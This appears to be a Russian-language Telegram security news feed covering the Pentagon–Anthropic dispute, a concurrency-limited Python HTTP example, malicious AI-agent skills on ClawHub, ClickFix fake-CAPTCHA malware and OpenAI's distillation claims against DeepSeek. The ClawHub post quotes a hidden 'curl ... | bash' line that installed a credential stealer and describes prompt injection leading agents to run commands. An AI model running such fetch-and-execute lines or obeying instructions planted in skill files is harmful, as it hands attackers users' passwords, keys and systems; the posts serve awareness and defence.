Телеграм канал «Kali Linux»

⚡️ Пентагон может разорвать сотрудничество с Anthropic.

Причина - компания отказалась разрешить использование своих моделей для «любых законных целей».

Anthropic настаивает на жестких ограничениях:

- запрет на массовую внутреннюю слежку
- запрет на полностью автономное оружие без участия человека

Конфликт обострился после спорного случая использования Claude в военной операции.
Это показало более глубокую проблему.

С одной стороны - Пентагон хочет максимально свободное применение ИИ.
С другой - Anthropic придерживается строгой политики безопасности и этики.

И здесь возникает парадокс:

Высокие этические стандарты начинают мешать бизнесу.

Главный вопрос на будущее:

Сможет ли компания сохранить принципы и при этом конкурировать на рынке, где государственные контракты - это миллиарды?

https://www.axios.com/2026/02/15/claude-pentagon-anthropic-contract-maduro

🖥 Как случайно сделать DDoS своим же кодом

Как случайно устроить DDoS самому себе - самый частый сценарий это когда ты запускаешь 1000 запросов параллельно и думаешь, что ускоряешься, а на деле убиваешь свой же сервис или сайт.

Что ломает всё быстрее всего:

Нет лимитов на конкурентность - корутины или потоки плодятся бесконечно

Нет пула соединений - каждый запрос создаёт новый коннект и душит сеть

Нет таймаутов - зависшие запросы копятся и съедают ресурсы

Нет ретраев с backoff - ты усиливаешь нагрузку, когда системе и так плохо

Нет rate limit - ты сам становишься источником перегруза

Правильная база - всегда ограничивай параллелизм семафором, используй один клиент с пулом, ставь таймауты и делай аккуратные ретраи.


import asyncio
import httpx

URLS = ["https://example.com"] * 500

async def fetch(client, sem, url):
async with sem: # лимит конкурентности
r = await client.get(url, timeout=10.0)
return r.status_code

async def main():
sem = asyncio.Semaphore(20) # не больше 20 запросов одновременно
limits = httpx.Limits(max_connections=50, max_keepalive_connections=20)
async with httpx.AsyncClient(limits=limits) as client: # пул соединений
tasks = [fetch(client, sem, u) for u in URLS]
results = await asyncio.gather(*tasks, return_exceptions=True)
print("done:", len(results))

asyncio.run(main())

@linuxkalii

⚡️ AI-плагины стали новым вектором атак

В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.

Что произошло

- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие

Как работала атака

В файле SKILL.md скрывалась инструкция:

curl -sL malware_link | bash


После выполнения устанавливался Atomic Stealer (macOS), который собирал:

- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain

На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.

Дополнительно

- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз

Почему это важно

ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.

Теперь риск выше, чем в классических supply chain атаках.

Раньше:
— вредоносный пакет выполнялся автоматически

Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам

AI-агенты становятся новой целью supply chain-атак.

Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.

Вывод

Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам

В эпоху агентного AI безопасность важнее удобства.

@linuxkalii

⚡️ Хакеры начали атаковать пользователей Windows через фейковые CAPTCHA.

Схема простая.
На сайте появляется «проверка Cloudflare», но вместо обычных картинок пользователя просят:
- нажать Win + R
- вставить текст
- нажать Enter

В буфер обмена уже подставлена PowerShell-команда.
После запуска она скачивает и устанавливает вредонос (StealC).

Что происходит дальше:
- кража паролей из браузеров
- доступ к Outlook и почте
- выгрузка криптокошельков
- данные Steam и других сервисов
- системная информация и скриншоты

Почему это опасно
Файл не скачивается вручную.
Пользователь сам запускает вредонос — защита часто не срабатывает.

Метод называется ClickFix — и он активно распространяется, потому что выглядит как обычная проверка безопасности.

Главный вывод
Если сайт просит выполнить что-то через Win + R, PowerShell или Terminal — это почти наверняка атака.

Сегодня главный вектор взлома - не уязвимости системы, а доверие пользователя.

https://www.windowscentral.com/microsoft/windows/windows-pc-targeted-by-hackers-in-a-fake-captcha-scam

@linuxkalii

2000
Линус Торвальдс:
«Разговоры ничего не стоят.
Покажите мне код.»

2026
ИИ:
«Код ничего не стоит.
Покажите мне промпт»

✔️ OpenAI обвинила DeepSeek в краже знаний через дистилляцию.

В меморандуме для Комитета Палаты представителей по Китаю OpenAI пожаловалась, что DeepSeek обучала свои модели на выходных данных чужих моделей для воспроизведения возможностей американских ИИ-систем.

По данным компании, сотрудники DeepSeek применяли сторонние роутеры и программный доступ к API, чтобы обойти защитные механизмы. OpenAI также указала на теневых реселлеров своих сервисов. Заблокировать их активность пока безрезультатны: методы обфускации становятся все изощреннее.

Помимо бизнес-угрозы, китайские модели бесплатны, тогда как американские ИИ-гиганты инвестировали миллиарды в инфраструктуру.

https://www.bloomberg.com/news/articles/2026-02-12/openai-accuses-deepseek-of-distilling-us-models-to-gain-an-edge